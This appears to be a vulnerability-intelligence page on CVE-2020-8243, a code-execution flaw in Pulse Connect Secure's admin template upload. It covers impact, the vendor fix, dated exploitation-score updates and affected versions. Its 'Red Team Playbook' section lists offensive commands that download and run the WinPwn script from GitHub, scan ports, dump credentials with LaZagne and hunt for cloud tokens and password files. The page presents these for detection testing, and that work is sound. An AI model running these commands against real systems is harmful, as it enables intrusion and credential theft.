CVE-2020-8243
Overview
This vulnerability is a code injection flaw rooted in improper input validation within the administrative web interface of Pulse Connect Secure versions prior to 9.1R8.2. Specifically, the system allows authenticated users to upload custom templates without adequate sanitization, enabling malicious code to be embedded and executed. The affected component is the template upload functionality in the admin interface, which fails to restrict or validate the content of uploaded templates, leading to arbitrary code execution.
Vulnerability Description
A vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload custom template to perform an arbitrary code execution.
Impact
An attacker with administrative credentials can leverage this vulnerability to execute arbitrary code on the Pulse Connect Secure server, potentially gaining full control over the system. This enables unauthorized access to sensitive data, manipulation of system functions, and the ability to disrupt services. The prerequisite is possession of a valid admin-level account, which may be obtained through credential compromise or insider threat. The real-world consequence includes complete system compromise, data breaches, and potential lateral movement within the network environment.
Solution
Ivanti has released security advisory SA44588 addressing this issue in Pulse Connect Secure. The vulnerability is fixed in version 9.1R8.2 and later. Administrators are advised to upgrade affected systems to at least version 9.1R8.2. Detailed patch instructions and additional mitigation guidance are available at https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588. No other workarounds are recommended beyond applying the vendor-supplied update.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Pulse Connect Secure admin web interface allows authenticated attackers to upload custom templates, leading to arbitrary code execution. This flaw arises from inadequate input validation and insufficient restrictions on file uploads, which can enable malicious users to execute unauthorized commands on the server. The affected versions of Pulse Connect Secure, particularly those prior to 9.1R8.2, lack the necessary safeguards to prevent such exploitation. By leveraging this vulnerability, an attacker can manipulate the system to run arbitrary code, potentially compromising the integrity and confidentiality of the underlying infrastructure.
Exploitation of this vulnerability can occur through several attack vectors. An authenticated user, who may have legitimate access to the admin interface, can upload a crafted template file containing malicious code. Once uploaded, this file can be executed by the server, allowing the attacker to gain control over the system. Scenarios may include leveraging stolen credentials or exploiting weak authentication mechanisms to gain access to the admin interface. Additionally, if the attacker can escalate privileges, they could further exploit the system, leading to a broader compromise of the network and its resources.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Pulse Connect Secure for secure remote access. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The business risks associated with such incidents include financial losses, reputational damage, and legal ramifications stemming from non-compliance with data protection regulations. Organizations may face operational challenges as they respond to incidents, conduct investigations, and implement remediation measures. The potential for widespread damage underscores the importance of addressing this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in the system and ensure that all software is up to date. Monitoring logs for unusual activity, particularly around file uploads and administrative actions, can provide early warning signs of exploitation attempts. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel can access the admin interface. Implementing a web application firewall (WAF) can also help filter out malicious requests and provide an additional layer of security.
In conclusion, the vulnerability in the Pulse Connect Secure admin web interface represents a serious threat to organizations that utilize this product. The potential for arbitrary code execution through file uploads poses significant risks, including unauthorized access and data breaches. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to detect and mitigate the associated risks. Proactive measures, including regular updates, monitoring, and access controls, are essential to safeguard against exploitation and protect sensitive information.
CVE-2020-8243 has been newly incorporated into the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting increased governmental prioritization and formal mitigation deadlines. This inclusion elevates the vulnerability’s profile, signaling that federal agencies and critical infrastructure sectors are expected to address it promptly by the specified due date. Concurrently, the CVSS score has been updated from 0.0 to 7.2, aligning with its recognized potential for arbitrary code execution via authenticated access. The emergence of a measurable Exploit Prediction Scoring System (EPSS) score at 0.1322 further indicates a tangible likelihood of exploitation attempts in the wild, although current trends show a slight decrease in activity. While no new exploit techniques or ransomware associations have been identified through our telemetry, the formal recognition by CISA and the quantifiable EPSS score underscore a heightened risk posture. Defenders should interpret these developments as a clear signal that this vulnerability has moved from theoretical to practical concern, warranting prioritized attention within vulnerability management programs. Overall, the threat level has increased from negligible to high, reflecting both the technical severity and the operational urgency imposed by regulatory directives.
Update 2 — June 13, 2026
Recent updates from CSURFACE threat intelligence indicate a marked escalation in the exploit prediction score for CVE-2020-8243, with the EPSS rising sharply by over 55% to a current level placing it near the top percentile of predicted exploitation likelihood. This increase reflects a growing confidence in the vulnerability’s active targeting potential, despite the absence of new exploit code or ransomware group associations in our telemetry. The upward trend in EPSS, coupled with the formal inclusion of this vulnerability in the Known Exploited Vulnerabilities catalog and corresponding CISA directives, signals a shift from theoretical risk to imminent operational threat. For defenders, this evolution underscores the urgency of prioritizing CVE-2020-8243 within patch management and monitoring strategies, as the vulnerability’s exploitation window is now demonstrably expanding. Consequently, the threat level has escalated from moderate to high, driven by both quantitative risk metrics and regulatory emphasis, indicating that adversaries are increasingly likely to leverage this flaw in targeted intrusions.
Update 3 — August 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2020-8243, indicating increased adversary interest and potential preparatory actions targeting vulnerable Pulse Connect Secure instances. While no new exploit variants or ransomware affiliations have been observed, the sharp rise in telemetry signals suggests that threat actors are intensifying reconnaissance or initial access attempts leveraging this vulnerability. This development elevates the operational urgency for defenders to enhance monitoring and prioritize remediation efforts, as the expanding exploitation window increases the likelihood of successful intrusions. Consequently, the threat level associated with CVE-2020-8243 should be reassessed upward to reflect a higher probability of active exploitation, reinforcing its criticality within enterprise risk management frameworks.
Affected Products (28)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r8:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r8.1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8243 |
| kb.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8243 |